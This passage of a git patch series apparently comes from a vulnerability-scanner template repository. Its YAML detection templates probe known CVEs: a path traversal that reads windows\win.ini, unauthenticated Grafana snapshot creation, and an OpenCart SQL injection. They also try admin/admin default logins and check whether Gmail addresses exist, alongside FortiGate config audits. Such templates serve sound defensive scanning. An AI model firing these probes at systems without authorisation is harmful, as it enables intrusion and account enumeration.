https://nvd.nist.gov/vuln/detail/CVE-2022-1040 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 9.8 @@ -18,7 +18,7 @@ info: requests: - method: POST path: - - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" + - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" headers: X-Requested-With: "XMLHttpRequest" @@ -37,4 +37,3 @@ requests: - type: status status: - 200 - From 3af4c93a9b995dce1652452aa6e9f19de9b71764 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 21:55:41 +0530 Subject: [PATCH 028/115] Update CVE-2022-1040.yaml --- cves/2022/CVE-2022-1040.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-1040.yaml b/cves/2022/CVE-2022-1040.yaml index 9f011e4d50..deea98159f 100644 --- a/cves/2022/CVE-2022-1040.yaml +++ b/cves/2022/CVE-2022-1040.yaml @@ -18,9 +18,9 @@ info: requests: - method: POST path: - - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" + - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" headers: - X-Requested-With: "XMLHttpRequest" + X-Requested-With: "XMLHttpRequest" matchers-condition: and matchers: From c3ca28246bbf3c9cb85fe34d78fb951ff7ee8396 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 7 May 2022 10:57:44 +0530 Subject: [PATCH 029/115] misc updates --- cves/2019/CVE-2019-15043.yaml | 18 +++++++++++------- cves/2021/CVE-2021-27358.yaml | 2 +- 2 files changed, 12 insertions(+), 8 deletions(-) diff --git a/cves/2019/CVE-2019-15043.yaml b/cves/2019/CVE-2019-15043.yaml index a56e338adf..b89d8e0d35 100644 --- a/cves/2019/CVE-2019-15043.yaml +++ b/cves/2019/CVE-2019-15043.yaml @@ -1,7 +1,7 @@ id: CVE-2019-15043 info: - name: Grafana unauthenticated API + name: Grafana Unauthenticated Snapshot Creation author: bing0o severity: high description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. @@ -14,23 +14,27 @@ info: cvss-score: 7.5 cve-id: CVE-2019-15043 cwe-id: CWE-306 - tags: cve,cve2019,grafana + tags: cve,cve2019,grafana,unauth requests: - raw: - | POST /api/snapshots HTTP/1.1 Host: {{Hostname}} - Connection: close - Content-Length: 235 - Accept: */* - Accept-Language: en Content-Type: application/json {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} + matchers-condition: and matchers: - part: body type: word words: - - deleteKey + - '"deleteUrl":' + - '"deleteKey":' + condition: and + + - type: word + part: header + words: + - "application/json" \ No newline at end of file diff --git a/cves/2021/CVE-2021-27358.yaml b/cves/2021/CVE-2021-27358.yaml index a6b176d183..8bd61e8dd5 100644 --- a/cves/2021/CVE-2021-27358.yaml +++ b/cves/2021/CVE-2021-27358.yaml @@ -13,6 +13,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2021-27358 + cwe-id: CWE-306 tags: cve,cve2021,grafana,unauth requests: @@ -20,7 +21,6 @@ requests: - | POST /api/snapshots HTTP/1.1 Host: {{Hostname}} - Accept: application/json Content-Type: application/json {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} From e4760f13bf1c0cf4f72b4dbd61fe8c4a9f36228d Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 7 May 2022 11:01:47 +0530 Subject: [PATCH 031/115] Removed duplicate CVE template --- cves/2019/CVE-2019-15043.yaml | 40 ----------------------------------- cves/2021/CVE-2021-27358.yaml | 2 +- 2 files changed, 1 insertion(+), 41 deletions(-) delete mode 100644 cves/2019/CVE-2019-15043.yaml diff --git a/cves/2019/CVE-2019-15043.yaml b/cves/2019/CVE-2019-15043.yaml deleted file mode 100644 index b89d8e0d35..0000000000 --- a/cves/2019/CVE-2019-15043.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2019-15043 - -info: - name: Grafana Unauthenticated Snapshot Creation - author: bing0o - severity: high - description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. - reference: - - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - - https://community.grafana.com/t/release-notes-v6-3-x/19202 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2019-15043 - cwe-id: CWE-306 - tags: cve,cve2019,grafana,unauth - -requests: - - raw: - - | - POST /api/snapshots HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} - - matchers-condition: and - matchers: - - part: body - type: word - words: - - '"deleteUrl":' - - '"deleteKey":' - condition: and - - - type: word - part: header - words: - - "application/json" \ No newline at end of file diff --git a/cves/2021/CVE-2021-27358.yaml b/cves/2021/CVE-2021-27358.yaml index 8bd61e8dd5..3eed4dd72d 100644 --- a/cves/2021/CVE-2021-27358.yaml +++ b/cves/2021/CVE-2021-27358.yaml @@ -2,7 +2,7 @@ id: CVE-2021-27358 info: name: Grafana Unauthenticated Snapshot Creation - author: pdteam + author: pdteam,bing0o severity: high description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set. reference: From a8f5c98f2c4ae2c16d8813c2d36c61ec18d4ea74 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 7 May 2022 12:19:43 +0530 Subject: [PATCH 033/115] FortiGate config-audit (#4275) * Add files via upload * Auto Generated CVE annotations [Wed Mar 16 11:29:14 UTC 2022] :robot: * Auto Generated New Template Addition List [Wed Mar 16 13:48:01 UTC 2022] :robot: * moving templates into jolokia directory * duplicate of jolokia-unauthenticated-lfi * merged similar templates into one with updated matchers * Auto Generated New Template Addition List [Wed Mar 23 10:21:57 UTC 2022] :robot: * Delete .new-additions * Auto Generated New Template Addition List [Wed Mar 23 10:22:29 UTC 2022] :robot: * conflict update * Auto Generated New Template Addition List [Wed Mar 23 10:23:39 UTC 2022] :robot: * Auto Generated New Template Addition List [Wed Mar 23 10:26:51 UTC 2022] :robot: * Add files via upload * Auto Generated New Template Addition List [Thu Apr 28 11:25:25 UTC 2022] :robot: * Auto Generated CVE annotations [Thu Apr 28 11:25:55 UTC 2022] :robot: * Update and rename sucuri-webs-firewall-default-page-detect.yaml to sucuri-notconfigured-page-detect.yaml * Auto Generated New Template Addition List [Thu Apr 28 20:25:56 UTC 2022] :robot: * mise update * Create config-audit * Delete config-audit * Add files via upload * matcher fixes / ext update / typos update Co-authored-by: GitHub Action Co-authored-by: sandeep Co-authored-by: Prince Chaddha --- .new-additions | 26 ----------------- cves/2021/CVE-2021-30497.yaml | 3 +- file/audit/fortigate/auto-usb-install.yaml | 28 +++++++++++++++++++ file/audit/fortigate/heuristic-scan.yaml | 28 +++++++++++++++++++ file/audit/fortigate/inactivity-timeout.yaml | 27 ++++++++++++++++++ file/audit/fortigate/maintainer-account.yaml | 27 ++++++++++++++++++ file/audit/fortigate/password-policy.yaml | 27 ++++++++++++++++++ file/audit/fortigate/remote-auth-timeout.yaml | 27 ++++++++++++++++++ file/audit/fortigate/scp-admin.yaml | 27 ++++++++++++++++++ file/audit/fortigate/strong-ciphers.yaml | 27 ++++++++++++++++++ 10 files changed, 219 insertions(+), 28 deletions(-) create mode 100644 file/audit/fortigate/auto-usb-install.yaml create mode 100644 file/audit/fortigate/heuristic-scan.yaml create mode 100644 file/audit/fortigate/inactivity-timeout.yaml create mode 100644 file/audit/fortigate/maintainer-account.yaml create mode 100644 file/audit/fortigate/password-policy.yaml create mode 100644 file/audit/fortigate/remote-auth-timeout.yaml create mode 100644 file/audit/fortigate/scp-admin.yaml create mode 100644 file/audit/fortigate/strong-ciphers.yaml diff --git a/.new-additions b/.new-additions index 3842c55ff0..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,26 +0,0 @@ -cves/2021/CVE-2021-25111.yaml -cves/2021/CVE-2021-25118.yaml -cves/2021/CVE-2021-36356.yaml -cves/2021/CVE-2021-39312.yaml -cves/2022/CVE-2022-0165.yaml -cves/2022/CVE-2022-0201.yaml -cves/2022/CVE-2022-0288.yaml -cves/2022/CVE-2022-0422.yaml -cves/2022/CVE-2022-0540.yaml -cves/2022/CVE-2022-0543.yaml -cves/2022/CVE-2022-0591.yaml -cves/2022/CVE-2022-1439.yaml -cves/2022/CVE-2022-26352.yaml -cves/2022/CVE-2022-26564.yaml -exposed-panels/bigip-rest-panel.yaml -exposed-panels/cyberoam-ssl-vpn-panel.yaml -exposed-panels/oracle-containers-panel.yaml -exposed-panels/oracle-enterprise-manager-login.yaml -exposed-panels/ruijie/rg-uac-panel.yaml -exposed-panels/supermicro-bmc-panel.yaml -exposed-panels/xoops/xoops-installation-wizard.yaml -exposed-panels/zoneminder-login.yaml -exposures/files/desktop-ini-exposure.yaml -technologies/sucuri-firewall.yaml -vulnerabilities/ruijie/ruijie-password-leak.yaml -vulnerabilities/wordpress/health-check-lfi.yaml diff --git a/cves/2021/CVE-2021-30497.yaml b/cves/2021/CVE-2021-30497.yaml index 2db829942c..ad0b73303a 100644 --- a/cves/2021/CVE-2021-30497.yaml +++ b/cves/2021/CVE-2021-30497.yaml @@ -7,12 +7,11 @@ info: description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder reference: - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/ - tags: cve,cve2021,avalanche,traversal classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2021-30497 - cwe-id: CWE-22 + tags: cve,cve2021,avalanche,traversal requests: - method: GET diff --git a/file/audit/fortigate/auto-usb-install.yaml b/file/audit/fortigate/auto-usb-install.yaml new file mode 100644 index 0000000000..01c105ea73 --- /dev/null +++ b/file/audit/fortigate/auto-usb-install.yaml @@ -0,0 +1,28 @@ +id: auto-usb-install + +info: + name: Auto USB Installation Enabled + author: pussycat0x + severity: info + description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port. + reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + tags: fortigate,config,audit,firewall + +file: + - extensions: + - conf + + matchers-condition: and + matchers: + - type: word + words: + - "set auto-install-config disable" + - "set auto-install-image disable" + negative: true + + - type: word + words: + - "config system" + - "config router" + - "config firewall" + condition: or diff --git a/file/audit/fortigate/heuristic-scan.yaml b/file/audit/fortigate/heuristic-scan.yaml new file mode 100644 index 0000000000..cab986f036 --- /dev/null +++ b/file/audit/fortigate/heuristic-scan.yaml @@ -0,0 +1,28 @@ +id: heuristic-scan + +info: + name: Heuristic scanning is not configured + author: pussycat0x + severity: info + description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled. + reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + tags: fortigate,config,audit,firewall + +file: + - extensions: + - conf + + matchers-condition: and + matchers: + - type: word + words: + - "config antivirus heuristic" + - "set mode block" + negative: true + + - type: word + words: + - "config system" + - "config router" + - "config firewall" + condition: or \ No newline at end of file diff --git a/file/audit/fortigate/inactivity-timeout.yaml b/file/audit/fortigate/inactivity-timeout.yaml new file mode 100644 index 0000000000..9c032f8874 --- /dev/null +++ b/file/audit/fortigate/inactivity-timeout.yaml @@ -0,0 +1,27 @@ +id: inactivity-timeout + +info: + name: Inactivity Timeout Not Implemented + author: pussycat0x + severity: info + description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer. + reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + tags: fortigate,config,audit,firewall + +file: + - extensions: + - conf + + matchers-condition: and + matchers: + - type: word + words: + - "set admin-console-timeout" + negative: true + + - type: word + words: + - "config system" + - "config router" + - "config firewall" + condition: or \ No newline at end of file diff --git a/file/audit/fortigate/maintainer-account.yaml b/file/audit/fortigate/maintainer-account.yaml new file mode 100644 index 0000000000..bb9068401a --- /dev/null +++ b/file/audit/fortigate/maintainer-account.yaml @@ -0,0 +1,27 @@ +id: maintainer-account + +info: + name: Maintainer Account Not Implemented + author: pussycat0x + severity: info + description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI.. + reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + tags: fortigate,config,audit,firewall + +file: + - extensions: + - conf + + matchers-condition: and + matchers: + - type: word + words: + - "set admin-maintainer" + negative: true + + - type: word + words: + - "config system" + - "config router" + - "config firewall" + condition: or \ No newline at end of file diff --git a/file/audit/fortigate/password-policy.yaml b/file/audit/fortigate/password-policy.yaml new file mode 100644 index 0000000000..44910a95d1 --- /dev/null +++ b/file/audit/fortigate/password-policy.yaml @@ -0,0 +1,27 @@ +id: password-policy + +info: + name: Password Policy not Set + author: pussycat0x + severity: info + description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements. + reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + tags: fortigate,config,audit,firewall + +file: + - extensions: + - conf + + matchers-condition: and + matchers: + - type: word + words: + - "config system password-policy" + negative: true + + - type: word + words: + - "config system" + - "config router" + - "config firewall" + condition: or \ No newline at end of file diff --git a/file/audit/fortigate/remote-auth-timeout.yaml b/file/audit/fortigate/remote-auth-timeout.yaml new file mode 100644 index 0000000000..43870c984d --- /dev/null +++ b/file/audit/fortigate/remote-auth-timeout.yaml @@ -0,0 +1,27 @@ +id: remote-auth-timeout + +info: + name: Remote Authentication timeout not set + author: pussycat0x + severity: info + description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer. + reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + tags: fortigate,config,audit,firewall + +file: + - extensions: + - conf + + matchers-condition: and + matchers: + - type: word + words: + - "set remoteauthtimeout" + negative: true + + - type: word + words: + - "config system" + - "config router" + - "config firewall" + condition: or \ No newline at end of file diff --git a/file/audit/fortigate/scp-admin.yaml b/file/audit/fortigate/scp-admin.yaml new file mode 100644 index 0000000000..4f776836b6 --- /dev/null +++ b/file/audit/fortigate/scp-admin.yaml @@ -0,0 +1,27 @@ +id: scp-admin + +info: + name: Admin-SCP Disabled + author: pussycat0x + severity: info + description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file. + reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + tags: fortigate,config,audit,firewall + +file: + - extensions: + - conf + + matchers-condition: and + matchers: + - type: word + words: + - "set admin-scp enable" + negative: true + + - type: word + words: + - "config system" + - "config router" + - "config firewall" + condition: or \ No newline at end of file diff --git a/file/audit/fortigate/strong-ciphers.yaml b/file/audit/fortigate/strong-ciphers.yaml new file mode 100644 index 0000000000..170d6183a5 --- /dev/null +++ b/file/audit/fortigate/strong-ciphers.yaml @@ -0,0 +1,27 @@ +id: strong-ciphers + +info: + name: HTTPS/SSH Strong Ciphers Not Enabled + author: pussycat0x + severity: info + description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish. + reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + tags: fortigate,config,audit,firewall + +file: + - extensions: + - conf + + matchers-condition: and + matchers: + - type: word + words: + - "set strong-crypto enable" + negative: true + + - type: word + words: + - "config system" + - "config router" + - "config firewall" + condition: or \ No newline at end of file From 1e60026e8066c9c5361d37ddcf4aff8ffe3e456c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 7 May 2022 06:49:55 +0000 Subject: [PATCH 034/115] Auto Generated New Template Addition List [Sat May 7 06:49:55 UTC 2022] :robot: --- .new-additions | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..7147a7d02a 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1,34 @@ +cves/2021/CVE-2021-25111.yaml +cves/2021/CVE-2021-25118.yaml +cves/2021/CVE-2021-36356.yaml +cves/2021/CVE-2021-39312.yaml +cves/2022/CVE-2022-0165.yaml +cves/2022/CVE-2022-0201.yaml +cves/2022/CVE-2022-0288.yaml +cves/2022/CVE-2022-0422.yaml +cves/2022/CVE-2022-0540.yaml +cves/2022/CVE-2022-0543.yaml +cves/2022/CVE-2022-0591.yaml +cves/2022/CVE-2022-1439.yaml +cves/2022/CVE-2022-26352.yaml +cves/2022/CVE-2022-26564.yaml +exposed-panels/bigip-rest-panel.yaml +exposed-panels/cyberoam-ssl-vpn-panel.yaml +exposed-panels/oracle-containers-panel.yaml +exposed-panels/oracle-enterprise-manager-login.yaml +exposed-panels/ruijie/rg-uac-panel.yaml +exposed-panels/supermicro-bmc-panel.yaml +exposed-panels/xoops/xoops-installation-wizard.yaml +exposed-panels/zoneminder-login.yaml +exposures/files/desktop-ini-exposure.yaml +file/audit/fortigate/auto-usb-install.yaml +file/audit/fortigate/heuristic-scan.yaml +file/audit/fortigate/inactivity-timeout.yaml +file/audit/fortigate/maintainer-account.yaml +file/audit/fortigate/password-policy.yaml +file/audit/fortigate/remote-auth-timeout.yaml +file/audit/fortigate/scp-admin.yaml +file/audit/fortigate/strong-ciphers.yaml +technologies/sucuri-firewall.yaml +vulnerabilities/ruijie/ruijie-password-leak.yaml +vulnerabilities/wordpress/health-check-lfi.yaml From b0aa2c1d173159d2a5e3815b90abf2c733b696fc Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sat, 7 May 2022 14:30:47 +0700 Subject: [PATCH 035/115] Add valid Google Mail checks (#4315) * Add valid Google Mail checks * misc: Replace to HEAD method --- fuzzing/valid-gmail-check.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 fuzzing/valid-gmail-check.yaml diff --git a/fuzzing/valid-gmail-check.yaml b/fuzzing/valid-gmail-check.yaml new file mode 100644 index 0000000000..ce4e608315 --- /dev/null +++ b/fuzzing/valid-gmail-check.yaml @@ -0,0 +1,18 @@ +id: valid-gmail-check + +info: + name: Valid Google Mail Check + author: dievus, dwisiswant0 + severity: info + +self-contained: true +requests: + - method: HEAD + path: + - "https://mail.google.com/mail/gxlu?email={{email}}" + + matchers: + - type: word + words: + - "COMPASS" + part: header From b3888dbf56cdb35d75b6166062d08e774e183521 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 7 May 2022 07:31:03 +0000 Subject: [PATCH 036/115] Auto Generated New Template Addition List [Sat May 7 07:31:03 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7147a7d02a..defe6625e4 100644 --- a/.new-additions +++ b/.new-additions @@ -29,6 +29,7 @@ file/audit/fortigate/password-policy.yaml file/audit/fortigate/remote-auth-timeout.yaml file/audit/fortigate/scp-admin.yaml file/audit/fortigate/strong-ciphers.yaml +fuzzing/valid-gmail-check.yaml technologies/sucuri-firewall.yaml vulnerabilities/ruijie/ruijie-password-leak.yaml vulnerabilities/wordpress/health-check-lfi.yaml From f09fd4b8f6ba0d69931f7ae91f9517661238113b Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 7 May 2022 13:03:25 +0530 Subject: [PATCH 037/115] added reference --- fuzzing/valid-gmail-check.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/fuzzing/valid-gmail-check.yaml b/fuzzing/valid-gmail-check.yaml index ce4e608315..50c3142755 100644 --- a/fuzzing/valid-gmail-check.yaml +++ b/fuzzing/valid-gmail-check.yaml @@ -1,9 +1,11 @@ -id: valid-gmail-check +id: valid-gmail-checker info: - name: Valid Google Mail Check - author: dievus, dwisiswant0 + name: Valid Google Mail Checker + author: dievus,dwisiswant0 severity: info + reference: + - https://github.com/dievus/geeMailUserFinder self-contained: true requests: @@ -13,6 +15,6 @@ requests: matchers: - type: word - words: - - "COMPASS" part: header + words: + - "COMPASS" \ No newline at end of file From e83081d0dcffae3fb031c7e1838ffa09f7f4897b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 7 May 2022 15:48:02 +0530 Subject: [PATCH 039/115] Update and rename CVE-2022-26233.yaml to cves/2022/CVE-2022-26233.yaml --- CVE-2022-26233.yaml => cves/2022/CVE-2022-26233.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) rename CVE-2022-26233.yaml => cves/2022/CVE-2022-26233.yaml (86%) diff --git a/CVE-2022-26233.yaml b/cves/2022/CVE-2022-26233.yaml similarity index 86% rename from CVE-2022-26233.yaml rename to cves/2022/CVE-2022-26233.yaml index 05f00cd433..1866d6cbaf 100644 --- a/CVE-2022-26233.yaml +++ b/cves/2022/CVE-2022-26233.yaml @@ -16,11 +16,12 @@ info: tags: cve,cve2022,barco,lfi requests: - - method: GET - path: - - '{{BaseURL}}/..\..\..\..\..\..\..\..\..\..\windows\win.ini' + - raw: + - |+ + GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + Host: {{Hostname}} - stop-at-first-match: true + unsafe: true matchers: - type: word part: body From b4dd0583289e2f3d602b1df0afb65c56f55398ac Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 7 May 2022 16:13:34 +0530 Subject: [PATCH 040/115] Update nginx-version.yaml --- technologies/nginx/nginx-version.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/technologies/nginx/nginx-version.yaml b/technologies/nginx/nginx-version.yaml index 622d6c6aca..d07c3a521c 100644 --- a/technologies/nginx/nginx-version.yaml +++ b/technologies/nginx/nginx-version.yaml @@ -17,7 +17,7 @@ requests: - type: regex part: header regex: - - "nginx\\[0-9.]+" + - 'nginx/[0-9.]+' - type: status status: @@ -26,6 +26,5 @@ requests: extractors: - type: regex part: header - group: 1 regex: - - "nginx\\([0-9.]+)" + - 'nginx/[0-9.]+' From cfc2a4a304f82d8da5671c1f28f221dd5d70840b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 7 May 2022 10:45:13 +0000 Subject: [PATCH 041/115] Auto Generated New Template Addition List [Sat May 7 10:45:13 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index defe6625e4..b09340bf98 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ cves/2022/CVE-2022-0540.yaml cves/2022/CVE-2022-0543.yaml cves/2022/CVE-2022-0591.yaml cves/2022/CVE-2022-1439.yaml +cves/2022/CVE-2022-26233.yaml cves/2022/CVE-2022-26352.yaml cves/2022/CVE-2022-26564.yaml exposed-panels/bigip-rest-panel.yaml From 7fed7d3e420e375344c40589bb8b1a9ac188d446 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 7 May 2022 16:22:09 +0530 Subject: [PATCH 043/115] Update telecom-gateway-default-login.yaml --- .../others/telecom-gateway-default-login.yaml | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/default-logins/others/telecom-gateway-default-login.yaml b/default-logins/others/telecom-gateway-default-login.yaml index f34b6bbd21..08f2ecd266 100644 --- a/default-logins/others/telecom-gateway-default-login.yaml +++ b/default-logins/others/telecom-gateway-default-login.yaml @@ -1,4 +1,4 @@ -id: telecom-gateway-default-password +id: telecom-gateway-default-login info: name: Telecom Gateway Default Login @@ -8,27 +8,29 @@ info: requests: - raw: - - | - GET /manager/index.php HTTP/1.1 - Host: {{Hostname}} - - | POST /manager/login.php HTTP/1.1 Host: {{Hostname}} - Name=admin&Pass=admin + Name={{username}}&Pass={{password}} + attack: pitchfork + payloads: + username: + - admin + password: + - admin redirects: true max-redirects: 2 matchers-condition: and matchers: - - type: word + part: body words: - "电信网关服务器管理后台" - "index-shang.php" - "di.php" - part: body + condition: and - type: status status: From cb66f11f66c0f98b7a4e2e3c5330183bc740d4e6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 7 May 2022 10:57:00 +0000 Subject: [PATCH 044/115] Auto Generated New Template Addition List [Sat May 7 10:57:00 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b09340bf98..c675295aab 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ cves/2022/CVE-2022-1439.yaml cves/2022/CVE-2022-26233.yaml cves/2022/CVE-2022-26352.yaml cves/2022/CVE-2022-26564.yaml +default-logins/others/telecom-gateway-default-login.yaml exposed-panels/bigip-rest-panel.yaml exposed-panels/cyberoam-ssl-vpn-panel.yaml exposed-panels/oracle-containers-panel.yaml From fffea79792d25baa0564f99ba9ea19ea8320699f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 7 May 2022 16:39:37 +0530 Subject: [PATCH 045/115] Update CVE-2018-11231.yaml --- cves/2018/CVE-2018-11231.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-11231.yaml b/cves/2018/CVE-2018-11231.yaml index 304ddb2a62..396b7b8a23 100644 --- a/cves/2018/CVE-2018-11231.yaml +++ b/cves/2018/CVE-2018-11231.yaml @@ -1,11 +1,12 @@ id: CVE-2018-11231 info: - name: Opencart Sqli + name: Opencart Divido plugin - Sql Injection author: ritikchaddha severity: high reference: - http://foreversong.cn/archives/1183 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 tags: opencart,sqli,cve,cve2018 requests: @@ -20,11 +21,10 @@ requests: max-redirects: 2 matchers-condition: and matchers: - - type: word + part: body words: - "6f7c6dcbc380aac3bcba1f9fccec991e" - part: body - type: status status: From b37f2dbff553634dac90523a3b87be41eb2f5dcb Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 8 May 2022 00:05:22 +0530 Subject: [PATCH 046/115] Added Nginx Dashboard (#4318) --- .../unauthenticated-nginx-dashboard.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 misconfiguration/unauthenticated-nginx-dashboard.yaml diff --git a/misconfiguration/unauthenticated-nginx-dashboard.yaml b/misconfiguration/unauthenticated-nginx-dashboard.yaml new file mode 100644 index 0000000000..142321c8eb --- /dev/null +++ b/misconfiguration/unauthenticated-nginx-dashboard.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-nginx-dashboard + +info: + name: Nginx Dashboard + author: BibekSapkota (sar00n) + severity: low + reference: + - https://www.acunetix.com/vulnerabilities/web/unrestricted-access-to-nginx-dashboard/ + metadata: + shpdan-query: html:"NGINX+ Dashboard" + tags: misconfig,nginx + +requests: + - method: GET + path: + - "{{BaseURL}}/dashboard.html" + + max-size: 2048 + matchers-condition: and + matchers: + - type: word + words: + - 'Nginx+ Dashboard' + + - type: status + status: + - 200 From 8dbea60a22d90c0d19fab00833413360d2fd734c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 7 May 2022 18:35:37 +0000 Subject: [PATCH 047/115] Auto Generated New Template Addition List [Sat May 7 18:35:37 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c675295aab..b2f001a9ff 100644 --- a/.new-additions +++ b/.new-additions @@ -32,6 +32,7 @@ file/audit/fortigate/remote-auth-timeout.yaml file/audit/fortigate/scp-admin.yaml file/audit/fortigate/strong-ciphers.yaml fuzzing/valid-gmail-check.yaml +misconfiguration/unauthenticated-nginx-dashboard.yaml technologies/sucuri-firewall.yaml vulnerabilities/ruijie/ruijie-password-leak.yaml vulnerabilities/wordpress/health-check-lfi.yaml From 8a8a99303176d14ac344b0c2955c4f0f399449c6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 7 May 2022 19:11:01 +0000 Subject: [PATCH 048/115] Auto Generated New Template Addition List [Sat May 7 19:11:01 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b2f001a9ff..d505ec3fe5 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2018/CVE-2018-11231.yaml cves/2021/CVE-2021-25111.yaml cves/2021/CVE-2021-25118.yaml cves/2021/CVE-2021-36356.yaml From 958b15663cd689a563f66f46461d18c1c0492e51 Mon 